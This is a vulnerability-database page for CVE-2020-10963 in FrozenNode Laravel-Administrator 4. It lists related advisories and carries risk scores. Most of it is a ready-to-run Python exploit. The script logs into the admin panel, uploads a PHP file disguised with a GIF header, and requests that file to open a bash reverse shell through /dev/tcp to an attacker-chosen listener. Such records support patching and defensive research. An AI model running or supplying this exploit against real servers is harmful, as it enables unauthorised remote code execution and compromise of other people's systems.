Vulners
Lucene search
Laravel Administrator 4 - Unrestricted File Upload (Authenticated)
| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
 | FrozenNode Laravel-Administrator Code Issue Vulnerability | 26 Mar 202000:00 | – | cnvd |
 | CVE-2020-10963 | 25 Mar 202021:23 | – | cve |
 | CVE-2020-10963 | 25 Mar 202021:23 | – | cvelist |
 | FrozenNode Laravel-Administrator unrestricted file upload | 24 May 202217:12 | – | github |
 | CVE-2020-10963 | 25 Mar 202022:15 | – | nvd |
 | GHSA-9R2J-RG24-FVPJ FrozenNode Laravel-Administrator unrestricted file upload | 24 May 202217:12 | – | osv |
 | Laravel Administrator 4 File Upload | 27 Nov 202000:00 | – | packetstorm |
 | Unrestricted file upload | 25 Mar 202022:15 | – | prion |
 | PT-2020-12451 · Frozennode · Laravel-Administrator | 25 Mar 202000:00 | – | ptsecurity |
 | CVE-2020-10963 | 22 May 202515:10 | – | redhatcve |
10
# Exploit title: Laravel Administrator 4 - Unrestricted File Upload (Authenticated)
# Author: Victor Campos and Xavi Beltran
# Contact: [email protected]
# Exploit Development: https://xavibel.com/2020/03/23/unrestricted-file-upload-in-frozennode-laravel-administrator/
# Date: 25/3/2020
# Software link: https://github.com/FrozenNode/Laravel-Administrator/
# Version : 4
# Tested on: Laravel-Administrator 4
# CVE : CVE-2020-10963
#!/usr/bin/env python
import requests,json,traceback
from requests.auth import HTTPBasicAuth
#Parameters to be set up (ENTER YOUR VALUES)
#===========================================
# Listener IP and port
ip = ""
port = ""
#Admin credentials
user = ""
password = ""
#URLs of the web application
domain = "" # For example "https://www.example.com"
login_url = "" # For example "/user/login"
fileupload_url = "" # For example "/admin/categories/image/file_upload"
uploaded_files_url = "" # For example "/categories/images"
#Reverse shell payload (DO NOT MODIFY THIS SECTION)
#==================================================
#GIF file header
shell = "GIF89a\r\n"
#php reverse shell
shell += "\x3c?php\r\nexec(\"/bin/bash -c \'bash -i \x3e /dev/tcp/" + ip + "/" + port + " 0\x3e&1\'\");?\x3e\r\n"
with requests.Session() as s:
try:
print("\n[+] Logging into the panel")
s.post(domain + login_url, data={'email':user,'password':password,'remember': '1'})
print("[+] Uploading the malicious file")
r = s.post(domain + fileupload_url, files={'name':'Picture.png','file': ('test.php',shell)})
print("[+] Response text:")
#print(r.text)
shell_file = (json.loads(r.text))["filename"]
print("[+] Name of uploaded file: " + shell_file)
print("\n[+] Executing the reverse shell on " + ip + ":" + port + "...")
r = s.get(domain + uploaded_files_url + '/' + shell_file)
except Exception as e:
print(str(traceback.format_exc()))Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
27 Nov 2020 00:00Current
7High risk
Vulners AI Score7
CVSS 26.5
CVSS 3.17.2
EPSS0.22416